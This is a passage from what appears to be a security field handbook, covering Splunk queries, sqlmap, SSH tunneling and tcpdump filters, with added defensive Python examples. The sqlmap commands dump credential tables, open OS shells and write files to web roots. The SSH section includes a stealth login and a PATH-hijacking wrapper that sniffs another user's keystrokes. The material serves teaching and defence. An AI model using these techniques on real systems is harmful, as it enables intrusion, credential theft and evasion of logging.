    Return the maximum delay by size, where size is broken down into
    a maximum of 10 equal sized buckets.
* | timechart span=5m avg(thruput) by host
    Graph the average thruput of hosts over time.
* | timechart avg(cpu_seconds) by host | outlier action=TR
    Create a timechart of average cpu_seconds by host, and remove
    data (outlying values) that may distort the timechart's axis.
sourcetype=ps | multikv | timechart span=1m avg(CPU) by host
    Search for all ps events, extract values, and calculate the
    average value of CPU each minute for each host.
sourcetype=web | timechart count by host | fillnull value=NULL
    Create a timechart of the count of events from web sources by
    host, and fill all null values with "NULL".
* | contingency datafield1 datafield2 maxrows=5 maxcols=5 usetotal=F
    Build a contingency table of datafields from all events.
* | correlate type=cocur
    Calculate the co-occurrence correlation between all fields.
* | addtotals fieldname=sum
    Calculate the sums of the numeric fields of each result, and put
    the sums in the field sum.
* | anomalousvalue action=filter pthresh=0.02
    Return events with uncommon values.
* | bucket size bins=10 | stats count(_raw) by size
    Bucket search results into 10 bins, and return the count of raw
    events for each bucket.
* | bucket _time span=5m | stats avg(thruput) by _time host
    Return the average thruput of each host for each 5 minute time
    span.
* | stats sum(<field>) as result | eval result=(result/1000)
    Sum up a field and do some arithmetic.
* | eval raw_len=len(_raw) | stats avg(raw_len), p10(raw_len), p90(raw_len) by sourcetype
    Determine the size of log events by checking len() of _raw. The
    p10() and p90() functions return the 10th and 90th percentiles.

ADMINISTRATIVE: Perform administration tasks using search commands.
Crawl your servers to discover more data to index, view
configuration settings, or see audit information.

| crawl root="/;/Users/" | input add
    Crawl root and home directories and add all possible inputs
    found (adds configuration information to [Link]).
| admin props
    View processing properties stored in [Link] - time zones,
    breaking characters, etc.
index=audit | audit
    View audit trail information stored in the local audit index.
    Also decrypt signed audit events while checking for gaps and
    tampering.
| eventcount summarize=false index=* | dedup index | fields index
    List all indices.
| eventcount summarize=false report_size=true index=* | eval size_MB = round(size_bytes/1024/1024,2)
    List all indices of a certain size.

SUBSEARCH: Use subsearches to use search results as an argument to
filter search result sets with more granularity.

* | set diff [search 404 | fields url] [search 303 | fields url]
    Return values of URL that contain the string "404" or "303" but
    not both.
login root | localize maxspan=5m maxpause=5m | map search="search failure starttimeu=$starttime$ endtimeu=$endtime$"
    Search for events around events associated with "root" and
    "login", and then search each of those time ranges for
    "failure".
[* | fields + source, sourcetype, host | format ]
    Create a search string from the values of the host, source and
    sourcetype fields.

EMAIL RESULTS
... | sendemail to="john@[Link]"
    By appending "sendemail" to any query you get the result by
    mail!

Uncoder: One common language for cyber security

[Link]
[Link] is an online translator for SIEM saved searches, filters, queries, API requests, correlation rules and Sigma rules, built for SOC analysts, threat hunters and SIEM engineers. The UI is simple, fast and private: you can translate queries from one tool to another without access to a SIEM environment, in a matter of seconds.
[Link] supports rules based on Sigma, ArcSight, Azure Sentinel, Elasticsearch, Graylog, Kibana, LogPoint, QRadar, Qualys, RSA NetWitness, Regex Grep, Splunk, Sumo Logic, Windows Defender ATP, Windows PowerShell and X-Pack Watcher.

REFERENCE:
[Link]
[Link]

SQLMAP
RED TEAM EXPLOITATION WEB/DATABASE
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

Simple mapping option

sqlmap -u "[Link]"

Use TOR SOCKS5 proxy

sqlmap -u "[Link]" --tor --tor-type=SOCKS5

Manually set the delay (in seconds) used for time-based blind injection

sqlmap -u "[Link]" --time-sec 15

List all databases located at target site

sqlmap -u "[Link]" --dbs

List all tables in a database:

sqlmap -u "[Link]" -D site_db --tables

Use authentication cookie:

sqlmap -u "[Link]" --data="id=1&str=val" -p "pid" -b --cookie="cookie1=<cookie_value1>;cookie2=<cookie_value2>" --random-agent --risk 3 --level 5

Use credentials to dump a database table:

sqlmap -u "[Link]" --method POST --data "username=user&password=user&submit=Submit" -D database_name -T users --dump

Dump only selected columns

sqlmap -u "[Link]" -D site_db -T users -C username,password --dump

List all columns in a table

sqlmap -u "[Link]" -D database_name -T users --columns

Dump database table content:

sqlmap -u "[Link]" -D database_name -T users --dump

Use the sqlmap OS shell:

sqlmap --dbms=mysql -u "[Link]" --os-shell

Use the sqlmap SQL shell:

sqlmap --dbms=mysql -u "[Link]" --sql-shell

Dump all entries of all tables in all databases (--dump-all ignores -D/-T; add --exclude-sysdbs to skip the DBMS system databases)
sqlmap -u [Link] --dump-all

Checking privileges (look for the FILE privilege before trying to read or write files)
sqlmap -u [Link] --privileges | grep FILE

Reading a file
sqlmap -u <URL> --file-read=<file to read>

sqlmap -u [Link] --file-read=/etc/passwd

Writing a file
sqlmap -u <url> --file-write=<file> --file-dest=<path>

sqlmap -u [Link] --file-write=[Link] --file-dest=/var/www/html/[Link]

POST
sqlmap -u <POST-URL> --data="<POST-parameters>"

sqlmap -u [Link] --data "uname=teste&passwd=&submit=Submit" -p uname

You can also supply the raw HTTP request from a file (for example one saved from Burp or the browser) instead of building the POST by hand:
./[Link] -r [Link] -p uname

Launch all tamper scripts at once (noisy, and many scripts are DBMS-specific or contradict each other; pick the ones matching the target DBMS and WAF when you can):

sqlmap -u '[Link]' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
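What sqlmap's boolean-based and UNION-based tests actually exploit, shown on a toy login query next to its parameterised fix. This is an added Python example, not sqlmap's code and not part of the original handbook; the SQLite table, the two user rows, the payload strings and the function names are constructed for the demonstration.

```python
"""The bug class sqlmap automates against: string-built SQL vs. bound parameters.
Added example, not sqlmap's code. Uses an in-memory SQLite database with two
constructed user rows so it runs offline."""
import sqlite3

# Payloads of the kind sqlmap's boolean-based and UNION-based tests send.
BOOLEAN_BYPASS = "' OR '1'='1"
UNION_DUMP = "' UNION SELECT password FROM users--"


def make_db():
    """Constructed sample data: two users with plaintext passwords (deliberately bad)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Injectable: user input is pasted into the statement text."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password):
    """Hardened: the same query with bound parameters; input can never become syntax."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


def demo():
    """Run both implementations against normal input and the two payloads."""
    conn = make_db()
    return {
        # normal credentials behave the same in both versions
        "safe_valid": login_safe(conn, "alice", "s3cret"),
        "vulnerable_valid": login_vulnerable(conn, "alice", "s3cret"),
        # ' OR '1'='1 turns the WHERE clause into a tautology: every user is "authenticated"
        "vulnerable_bypass": login_vulnerable(conn, "alice", BOOLEAN_BYPASS),
        "safe_bypass": login_safe(conn, "alice", BOOLEAN_BYPASS),
        # UNION SELECT pulls another column out of the table, which is what --dump does at scale
        "vulnerable_dump": login_vulnerable(conn, UNION_DUMP, "x"),
        "safe_dump": login_safe(conn, UNION_DUMP, "x"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-18s %s" % (name, result))
```

Run the file directly to see both implementations side by side: the bound-parameter version returns nothing for either payload, while the concatenated version authenticates everybody and leaks the password column. The fix sqlmap findings should drive is the parameterised form, not input filtering, which is exactly what the tamper scripts above are written to get past.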

REFERENCE:
[Link]
sheets/blob/master/docs/[Link]
[Link]
bypass/423

SSH
ALL ADMINISTRATION WINDOWS/LINUX/MacOS

BASIC
COMMAND / DESCRIPTION
sshpass -p '<your-passwd>' ssh <username>@<ssh_host>   (install with: brew install sshpass)
    ssh without typing the password
apt-get install openssh-client openssh-server
    Install the ssh client and the sshd server
service sshd restart, systemctl reload [Link]
    Restart or reload the sshd server
ssh -o StrictHostKeyChecking=no -p 2702 root@[Link] date
    Run a command over ssh (StrictHostKeyChecking=no also skips host key verification, so only use it where a MITM is not a concern)
ssh -vvv -p 2702 root@[Link] date 2>&1
    ssh with verbose output
sshuttle -r kubo@[Link] [Link]/16 [Link]/24 -e ...
    Setup an ssh tunnel for your web browsing
ssh-copy-id <username>@<ssh_host>, or manually update ~/.ssh/authorized_keys
    SSH passwordless (key-based) login
ssh-keygen -f ~/.ssh/known_hosts -R [Link]
    Remove an entry from the known_hosts file
diff local_file.txt <(ssh <username>@<ssh_host> 'cat remote_file.txt')
    Diff a local file with a remote one
diff <(ssh user@remote_host 'cat [Link]') <(ssh user2@remote_host2 'cat [Link]')
    Diff two remote files over ssh
scp -rp /tmp/abc/ ec2-user@<ssh-host>:/root/
    Upload with timestamps/permissions kept
exec ssh-agent bash && ssh-add /tmp/id_rsa, ssh-add
    SSH agent: load a key
ssh-add -l
    SSH agent: list all loaded keys
exec ssh-agent bash && ssh-keygen, ssh-add
    SSH agent: create and load a key
emacs /ssh:<username>@<ssh_host>:/path/to/file
    Emacs: read a remote file with tramp
ssh-keygen, ssh-keygen -C "your_email@[Link]" -t rsa
    Generate a new key pair (prefer -t ed25519 where the server supports it)
ssh-keygen -t rsa -f /tmp/sshkey -N "" -q
    Generate a key pair without interaction
ADVANCED
ssh-keygen -p -f id_rsa
    Add passphrase protection to an ssh key file
ssh -o IdentitiesOnly=yes -i [Link] myuser@[Link]
    Configure ssh to use only the given identity file instead of trying every loaded identity
ssh-keygen -i -f my_ssh.pub
    Import a public key in RFC4716/PEM/PKCS8 format and print it in OpenSSH format (-m PKCS8 or -m PEM selects the input format; -e converts the other way)
~/.ssh/authorized_keys, ~/.ssh/config, ~/.ssh/known_hosts
    Critical ssh files/folders
/etc/ssh/ssh_config, /etc/ssh/sshd_config
    SSH client and server config files
chmod 600 ~/.ssh/id_rsa
    SSH key file permission
chmod 700 ~/.ssh, chown -R $USER:$USER ~/.ssh
    SSH folder permission
chmod 644 ~/.ssh/authorized_keys
    authorized_keys file permission
ssh -o LogLevel=error
    Mute the "Warning: Permanently added ..." message

TUNNELING/PROXY
ssh -N -f -i <ssh-keyfile> -L '*:18085:localhost:8085' root@[Link]
    SSH port forward: local port 18085 (on all interfaces) forwards to port 8085 on the remote host; -N runs no remote command, -f backgrounds ssh after authentication
ssh -o UserKnownHostsFile=/dev/null -T user@[Link] "bash -i"
    No entry in /var/log/utmp, no bash profiles sourced, nothing written to known_hosts
ssh -g -L31337:[Link]:80 user@[Link]
    SSH tunnel OUT
ssh -o ExitOnForwardFailure=yes -g -R31338:[Link]:80 user@[Link]
    SSH tunnel IN
ssh -g -R 1080 user@[Link]
    SSH SOCKS4/5 IN: reverse dynamic forwarding (OpenSSH 7.6+); others use port 1080 on the remote host as a SOCKS proxy into your local network
ssh -D 1080 user@[Link]
    SSH SOCKS4/5 OUT: dynamic forwarding; your local port 1080 becomes a SOCKS proxy through the remote host
ssh -R *:40099:localhost:22 root@[Link], ssh -p 40099 root@[Link]
    Reverse port forward to a remote server, then ssh back through it (binding *:port on the remote side needs GatewayPorts yes in its sshd_config)
sshuttle -r kubo@[Link] [Link]/16 [Link]/24 [Link]/24 [Link]/24
    Setup an SSH tunnel for your web browsing
SECURITY
sed -i 's/^#\?PasswordAuthentication .*/PasswordAuthentication no/' /etc/ssh/sshd_config
    Disable SSH password authentication (reload sshd afterwards)
sed -i 's/^#\?PermitRootLogin .*/PermitRootLogin no/' /etc/ssh/sshd_config
    Disable root login. Only commenting the line out is not enough: the OpenSSH default is prohibit-password, which still allows root login with a key.
StrictHostKeyChecking yes in ~/.ssh/config
    Enable SSH host key checking (refuse unknown or changed host keys)
fail2ban command line tool
    Protect the SSH server from brute force attacks
SCP
scp -r ec2-user@<ssh-host>:/home/letsencrypt-20180825 ./
    Download a remote folder
scp -i <ssh-keyfile> /tmp/hosts ec2-user@<ssh-host>:/root/
    Upload a file
scp -r /tmp/abc/ ec2-user@<ssh-host>:/root/
    Upload a folder
scp -rp /tmp/abc/ ec2-user@<ssh-host>:/root/
    Upload with timestamps/permissions kept
sshfs name@server:/path/remote_folder /path/local_folder
    Mount a remote directory as a local folder
SSH LOGS
grep -R "ssh.*Received signal 15" /var/log/[Link]
    Events of SSH going down
grep -R "sshd.*Server listening" /var/log/[Link]
    Events of SSH coming up
grep -R "sshd.*Failed password for invalid user" /var/log/[Link]
    Events of SSH failed login for unknown users (drop "invalid user" to also catch wrong passwords for existing accounts)
grep -R "sshd.*POSSIBLE BREAK-IN ATTEMPT!" /var/log/[Link]
    Events of SSH break-in attempt (the client's reverse DNS does not match its forward lookup)
grep -R "sshd.*Bad protocol version identification" /var/log/[Link]
    Events of SSH port scan (a client connected without speaking SSH)
grep -R "sshd.*Accepted publickey for" /var/log/[Link]
    Events of ssh login by public key
grep -R "sshd.*Accepted password for" /var/log/[Link]
    Events of ssh login by password
grep -R "sshd.*pam_unix(sshd:session): session closed for" /var/log/[Link]
    Events of ssh logout
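A small detector built on the same patterns as the grep commands above: it classifies sshd log lines and flags source addresses that reach a failed-password threshold, which is the logic fail2ban's sshd jail applies. This is an added Python example, not from the handbook and not fail2ban's code; the log lines are constructed (modelled on the Debian/Ubuntu auth.log syslog format) and the function names are ours.

```python
"""Classify sshd log lines with the patterns from the SSH LOGS table and flag
password brute force per source IP. Added example; the log lines below are
constructed, modelled on the Debian/Ubuntu auth.log format."""
import re
from collections import Counter

SAMPLE_LOG = """\
Mar 10 09:01:02 host sshd[1201]: Server listening on 0.0.0.0 port 22.
Mar 10 09:02:10 host sshd[1310]: Failed password for invalid user admin from 198.51.100.7 port 51234 ssh2
Mar 10 09:02:12 host sshd[1311]: Failed password for invalid user oracle from 198.51.100.7 port 51240 ssh2
Mar 10 09:02:15 host sshd[1312]: Failed password for root from 198.51.100.7 port 51244 ssh2
Mar 10 09:02:18 host sshd[1313]: Failed password for invalid user test from 198.51.100.7 port 51250 ssh2
Mar 10 09:02:21 host sshd[1314]: Failed password for invalid user guest from 198.51.100.7 port 51256 ssh2
Mar 10 09:03:00 host sshd[1320]: Accepted publickey for ops from 203.0.113.5 port 40022 ssh2: ED25519 SHA256:abc
Mar 10 09:03:00 host sshd[1320]: pam_unix(sshd:session): session opened for user ops by (uid=0)
Mar 10 09:04:30 host sshd[1330]: Did not receive identification string from 192.0.2.9 port 33000
Mar 10 09:04:31 host sshd[1331]: Bad protocol version identification 'GET / HTTP/1.1' from 192.0.2.9 port 33002
Mar 10 09:05:00 host sshd[1340]: Accepted password for dev from 203.0.113.6 port 40100 ssh2
Mar 10 09:05:01 host sshd[1340]: reverse mapping checking getaddrinfo for bad.example [203.0.113.6] failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 10 09:09:00 host sshd[1320]: pam_unix(sshd:session): session closed for user ops
Mar 10 09:10:00 host sshd[1201]: Received signal 15; terminating.
"""

# Event classes keyed by the same substrings the grep commands look for; first match wins.
PATTERNS = [
    ("sshd_down",                 re.compile(r"ssh.*Received signal 15")),
    ("sshd_up",                   re.compile(r"sshd.*Server listening")),
    ("failed_login_unknown_user", re.compile(r"sshd.*Failed password for invalid user")),
    ("failed_login",              re.compile(r"sshd.*Failed password for (?!invalid user)")),
    ("break_in_attempt",          re.compile(r"sshd.*POSSIBLE BREAK-IN ATTEMPT!")),
    ("port_scan",                 re.compile(r"sshd.*Bad protocol version identification")),
    ("login_publickey",           re.compile(r"sshd.*Accepted publickey for")),
    ("login_password",            re.compile(r"sshd.*Accepted password for")),
    ("logout",                    re.compile(r"sshd.*pam_unix\(sshd:session\): session closed for")),
]
SRC_IP = re.compile(r" from (\d{1,3}(?:\.\d{1,3}){3}) port ")


def classify(line):
    """Return the first matching event class, or None for lines the table does not cover."""
    for name, rx in PATTERNS:
        if rx.search(line):
            return name
    return None


def summarize(log_text):
    """Count events per class and failed password attempts per source IP."""
    events, failures = Counter(), Counter()
    for line in log_text.splitlines():
        kind = classify(line)
        if kind is None:
            continue
        events[kind] += 1
        if kind.startswith("failed_login"):
            m = SRC_IP.search(line)
            if m:
                failures[m.group(1)] += 1
    return events, failures


def brute_force_sources(log_text, maxretry=5):
    """Source IPs at or above the failure threshold (fail2ban's sshd jail defaults to maxretry 5)."""
    _, failures = summarize(log_text)
    return sorted(ip for ip, n in failures.items() if n >= maxretry)


if __name__ == "__main__":
    events, failures = summarize(SAMPLE_LOG)
    for kind, n in sorted(events.items()):
        print("%-26s %d" % (kind, n))
    print("brute force sources:", brute_force_sources(SAMPLE_LOG))
```

Feed it the real file with `summarize(open("/var/log/auth.log").read())`; the two failed-login classes are kept apart on purpose, since attempts against valid account names are the ones worth escalating.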
SSH TOOLS
[Link]
    Export a local service to the Internet
sshuttle
    Transparent proxy/VPN over ssh
sshpass -p "$PASSWORD" ssh -o StrictHostKeyChecking=no $username@$ssh_ip
    ssh with the password supplied automatically

Almost invisible SSH

# ssh -o UserKnownHostsFile=/dev/null -T user@[Link] "bash -i"

Because no pty is allocated (-T), this will not add your user to the /var/log/utmp file and you won't show up in the w or who listing of logged-in users. It bypasses .profile and .bash_profile as well, since "bash -i" starts an interactive but non-login shell (~/.bashrc is still read). On your client side it will stop logging the host name to ~/.ssh/known_hosts. The authentication itself is still logged by sshd to the system log.

SSH tunnel OUT


We use this all the time to circumvent local firewalls and IP
filtering:
$ ssh -g -L31337:[Link]:80 user@[Link]

You or anyone else can now connect to your computer on port 31337
and get tunneled to [Link] port 80 and appear with the source IP
of '[Link]'.

SSH tunnel IN
We use this to give access to a friend to an internal machine that is not on the public Internet:

$ ssh -o ExitOnForwardFailure=yes -g -R31338:[Link]:80 user@[Link]

Anyone connecting to [Link] will get tunneled to [Link] on port 80 via your computer.

VPN over SSH
Tunnel layer 3 network traffic via an established ssh channel. This allows performing SYN scans with nmap and using your tools directly against the remote network. Root is needed on both sides to create the tun devices. These lines should be present in your /etc/ssh/sshd_config file (server-side):
PermitRootLogin yes
PermitTunnel yes

Create a pair of tun devices on client and server:

ssh username@server -w any:any

Configuring the client-side interface:

ip addr add [Link]/32 peer [Link] dev tun0

Configuring the server-side interface:

ip addr add [Link]/32 peer [Link] dev tun0

Enable IP forwarding and NAT on the server:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s [Link] -o eth0 -j MASQUERADE

Now you can make the peer host [Link] your default gateway or route a specific host/network through it:
route add -net [Link]/16 gw [Link]

In this example the server's external network interface is eth0 and the newly created tun devices on both sides are tun0.

SSH socks4/5 OUT

Dynamic forwarding: tunnel all your browser traffic through your server by configuring [Link]:1080 as the SOCKS4/5 proxy.

$ ssh -D 1080 user@[Link]

SSH socks4/5 IN
Reverse dynamic forwarding (OpenSSH 7.6+): give team members access to your local network, or let others use your host as an end-point, by them configuring [Link]:1080 on the server as their SOCKS4/5 proxy. For the remote port to be reachable from other hosts the server's sshd_config needs GatewayPorts enabled.
$ ssh -g -R 1080 user@[Link]

Sniff a user's SSH session

Requires permission to ptrace the target process: root, or a process of your own user with /proc/sys/kernel/yama/ptrace_scope set to 0.

$ strace -e trace=read -p <PID> 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done

Non-root sniff a user's SSH session

With /proc/sys/kernel/yama/ptrace_scope set to 1 you cannot attach strace to another process of the same user, but a process may still trace its own children. So create a wrapper script called 'ssh' that executes strace + the real ssh and logs the session. The SSH session will be sniffed and logged to ~/.ssh/logs/ the next time the user logs into his shell:

# Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh:
$ echo 'export PATH=~/.local/bin:$PATH' >>~/.profile

# Create a log directory and our own ssh wrapper
$ mkdir -p ~/.local/bin ~/.ssh/logs

$ cat >~/.local/bin/ssh
#! /bin/bash
strace -e trace=read -o '! ~/.local/bin/ssh-log $$' /usr/bin/ssh "$@"
# now press CTRL-d to close the file.

$ cat >~/.local/bin/ssh-log
#! /bin/bash
# keep only the 1-2 byte reads from the terminal fd (4 here; check the fd with strace if keystrokes are missing)
grep 'read(4' | cut -f2 -d\" | while read -r x; do
    if [ ${#x} -ne 2 ] && [ ${#x} -ne 1 ]; then continue; fi
    if [ x"${x}" == "x\\n" ] || [ x"${x}" == "x\\r" ]; then
        echo ""
    else
        echo -n "${x}"
    fi
done >~/.ssh/logs/ssh-log-"${1}"-`date +%s`.txt
# now press CTRL-d to close the file

$ chmod 755 ~/.local/bin/ssh ~/.local/bin/ssh-log

REFERENCE:
[Link]
[Link]

TCPDUMP
RED/BLUE TEAM NETWORK TRAFFIC LINUX/MacOS

BASIC SYNTAX
Match any traffic involving [Link] as destination or source
# tcpdump -i eth1 host [Link]

Match particular source only


# tcpdump -i eth1 src host [Link]

Match particular destination only


# tcpdump -i eth1 dst host [Link]

Match any traffic involving port 25 as source or destination


# tcpdump -i eth1 port 25

Source port 25
# tcpdump -i eth1 src port 25

Destination port 25
# tcpdump -i eth1 dst port 25

Network filtering:
# tcpdump -i eth1 net 192.168
# tcpdump -i eth1 src net 192.168

# tcpdump -i eth1 dst net 192.168

Protocol filtering:
# tcpdump -i eth1 arp
# tcpdump -i eth1 ip
# tcpdump -i eth1 tcp
# tcpdump -i eth1 udp
# tcpdump -i eth1 icmp

Boolean Expressions :
Negation : ! or "not" (without the quotes)
Concatenate : && or "and"
Alternate : || or "or"

Match any TCP traffic on port 80 (web) with [Link] or [Link] as destination host
# tcpdump -i eth1 '((tcp) and (port 80) and ((dst host [Link]) or (dst host [Link])))'

Match any ICMP traffic involving the destination with physical/MAC address [Link]
# tcpdump -i eth1 '((icmp) and ((ether dst host [Link])))'

Match any TCP traffic for the destination network 192.168 except destination host [Link]
# tcpdump -i eth1 '((tcp) and ((dst net 192.168) and (not dst host [Link])))'

ADVANCED FILTERING
Match packets whose IP header has options set (the IHL in the low nibble of ip[0] is greater than 5 words)
With a decimal mask
# tcpdump -i eth1 'ip[0] & 15 > 5'
With a hexadecimal mask
# tcpdump -i eth1 'ip[0] & 0xf > 5'

Match packets with the DF (Don't Fragment) flag set. Byte 6 of the IP header holds the three flag bits (reserved, DF, MF) in its top bits followed by the high bits of the fragment offset; 64 (0x40) is DF set, MF clear, offset zero.

# tcpdump -i eth1 'ip[6] = 64'

Match fragments, including the last fragment: flags/offset field non-zero, excluding the DF-only case above

# tcpdump -i eth1 '((ip[6:2] > 0) and (not ip[6] = 64))'

Match traceroute usage on the network (TTL lower than 5)

# tcpdump -i eth1 'ip[8] < 5'

Match packets longer than X bytes, where X is 600 bytes (IP total length field)
# tcpdump -i eth1 'ip[2:2] > 600'

Matching any TCP traffic with a source port > 1024


# tcpdump -i eth1 'tcp[0:2] > 1024'

Match packets with only the SYN flag set, the 14th byte would have
a binary value of 00000010 which equals 2 in decimal.
# tcpdump -i eth1 'tcp[13] = 2'

Matching SYN, ACK (00010010 or 18 in decimal)


# tcpdump -i eth1 'tcp[13] = 18'

Matching either SYN only or SYN-ACK datagrams


# tcpdump -i eth1 'tcp[13] & 2 = 2'

Matching PSH-ACK packets


# tcpdump -i eth1 'tcp[13] = 24'

Matching any combination containing FIN


# tcpdump -i eth1 'tcp[13] & 1 = 1'

Matching RST flag


# tcpdump -i eth1 'tcp[13] & 4 = 4'

Easier way to filter flags


# tcpdump -i eth1 'tcp[tcpflags] == tcp-ack'

Matching all packets with TCP-SYN or TCP-FIN set:

# tcpdump -i eth1 'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0'

Match any packet containing the "MAIL" command from SMTP exchanges. This assumes a 20-byte TCP header without options, so the payload starts at tcp[20].
# tcpdump -i eth1 '((port 25) and (tcp[20:4] = 0x4d41494c))'

Match any packets containing GET requests. This assumes 12 bytes of TCP options, so the payload starts at tcp[32]; a segment without options is missed. The data-offset form used for SSH below works for any header length.

# tcpdump -i eth1 'tcp[32:4] = 0x47455420'

SSH connection (on any port):

We will be looking for the reply given by the SSH server. OpenSSH usually replies with something like "SSH-2.0-OpenSSH_3.6.1p2". The first 4 bytes (SSH-) have the hex value 0x5353482D. tcp[12]>>2 is the TCP data offset in bytes, so the comparison starts at the first payload byte whatever the header length.
# tcpdump -i eth1 'tcp[(tcp[12]>>2):4] = 0x5353482D'

If we want to find any connection made to an older version of OpenSSH that still offers protocol version 1 (insecure and subject to MITM attacks), the reply from the server would be something like "SSH-1.99..."; 0x312E is "1." right after the "SSH-" prefix:
# tcpdump -i eth1 '(tcp[(tcp[12]>>2):4] = 0x5353482D) and (tcp[((tcp[12]>>2)+4):2] = 0x312E)'

Match ICMP messages of type 4 (source quench), sent in case of congestion on the network. The type is deprecated (RFC 6633) and modern stacks ignore it, so seeing it is itself noteworthy.
# tcpdump -i eth1 'icmp[0] = 4'
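The byte-offset filters above, checked against constructed packets. This is an added Python example, not from the handbook or from tcpdump: it builds minimal IPv4 and TCP headers with struct, re-implements each expression over the same ip[...] and tcp[...] offsets, and shows why the fixed-offset GET filter misses segments without TCP options while the data-offset form does not. The header builders, addresses, payloads and predicate names are assumptions made for the demonstration.

```python
"""Evaluate the tcpdump byte-offset filters above against constructed packets.
Added example, not from the original page or tcpdump; the header builders and
the sample packets are constructed here so it runs offline."""
import struct

# TCP flag bits in tcp[13]: CWR ECE URG ACK PSH RST SYN FIN = 128 64 32 16 8 4 2 1
FIN, SYN, RST, PSH, ACK = 1, 2, 4, 8, 16


def ipv4_header(ttl=64, df=True, mf=False, frag_off=0, options=b"", proto=6):
    """Raw IPv4 header; 'options' (multiple of 4 bytes) raises the IHL above 5."""
    ihl = 5 + len(options) // 4
    frag = ((0x2 if df else 0) | (0x1 if mf else 0)) << 13 | frag_off
    return struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, 40 + len(options), 0x1234,
                       frag, ttl, proto, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])) + options


def tcp_segment(sport, dport, flags, options=b"", payload=b""):
    """Raw TCP header (+ options + payload); the data offset grows with the options."""
    doff = 5 + len(options) // 4
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, doff << 4, flags, 65535, 0, 0) + options + payload


def ip(pkt, off, size=1):
    """ip[off:size] in tcpdump's notation (offset from the start of the IP header)."""
    return int.from_bytes(pkt[off:off + size], "big")


def tcp(pkt, off, size=1):
    """tcp[off:size]: offsets are relative to the TCP header, i.e. past IHL*4 bytes of IP header."""
    base = (pkt[0] & 0x0F) * 4
    return int.from_bytes(pkt[base + off:base + off + size], "big")


# The cheat sheet's filters as predicates; each comment gives the tcpdump expression.
FILTERS = {
    "ip_options":  lambda p: ip(p, 0) & 0xF > 5,                        # 'ip[0] & 0xf > 5'
    "df_set":      lambda p: ip(p, 6) == 64,                            # 'ip[6] = 64'
    "is_fragment": lambda p: ip(p, 6, 2) & 0x3FFF != 0,                 # 'ip[6:2] & 0x3fff != 0' (MF or offset)
    "low_ttl":     lambda p: ip(p, 8) < 5,                              # 'ip[8] < 5'
    "syn_only":    lambda p: tcp(p, 13) == 2,                           # 'tcp[13] = 2'
    "syn_ack":     lambda p: tcp(p, 13) == 18,                          # 'tcp[13] = 18'
    "any_syn":     lambda p: tcp(p, 13) & 2 == 2,                       # 'tcp[13] & 2 = 2'
    "syn_or_fin":  lambda p: tcp(p, 13) & (SYN | FIN) != 0,             # 'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0'
    "ssh_banner":  lambda p: tcp(p, tcp(p, 12) >> 2, 4) == 0x5353482D,  # 'tcp[(tcp[12]>>2):4] = 0x5353482D'
    "get_at_32":   lambda p: tcp(p, 32, 4) == 0x47455420,               # 'tcp[32:4] = 0x47455420'
}


def matches(name, pkt):
    return bool(FILTERS[name](pkt))


def run_checks():
    """Constructed packets exercising each filter; returns {description: expectation held}."""
    hdr = ipv4_header()
    opts12 = b"\x01" * 12  # 12 bytes of NOP options -> data offset of 8 words (32 bytes)
    ssh = tcp_segment(22, 40000, PSH | ACK, payload=b"SSH-2.0-OpenSSH_8.2\r\n")
    ssh_opt = tcp_segment(22, 40000, PSH | ACK, opts12, b"SSH-2.0-OpenSSH_8.2\r\n")
    get = tcp_segment(40000, 80, PSH | ACK, payload=b"GET / HTTP/1.1\r\n")
    get_opt = tcp_segment(40000, 80, PSH | ACK, opts12, b"GET / HTTP/1.1\r\n")
    return {
        "syn_only matches SYN":             matches("syn_only", hdr + tcp_segment(40000, 80, SYN)),
        "syn_only rejects SYN-ACK":         not matches("syn_only", hdr + tcp_segment(80, 40000, SYN | ACK)),
        "syn_ack matches SYN-ACK":          matches("syn_ack", hdr + tcp_segment(80, 40000, SYN | ACK)),
        "any_syn matches SYN-ACK":          matches("any_syn", hdr + tcp_segment(80, 40000, SYN | ACK)),
        "syn_or_fin matches FIN-ACK":       matches("syn_or_fin", hdr + tcp_segment(80, 40000, FIN | ACK)),
        "syn_or_fin rejects PSH-ACK":       not matches("syn_or_fin", hdr + tcp_segment(80, 40000, PSH | ACK)),
        "df_set on DF packet":              matches("df_set", hdr + get),
        "is_fragment rejects DF packet":    not matches("is_fragment", hdr + get),
        "is_fragment matches MF packet":    matches("is_fragment", ipv4_header(df=False, mf=True) + get),
        "df_set rejects MF packet":         not matches("df_set", ipv4_header(df=False, mf=True) + get),
        "ip_options with 4-byte option":    matches("ip_options", ipv4_header(options=b"\x01" * 4) + get),
        "low_ttl on ttl=1":                 matches("low_ttl", ipv4_header(ttl=1) + get),
        "ssh_banner without options":       matches("ssh_banner", hdr + ssh),
        "ssh_banner with 12B options":      matches("ssh_banner", hdr + ssh_opt),
        "get_at_32 with 12B options":       matches("get_at_32", hdr + get_opt),
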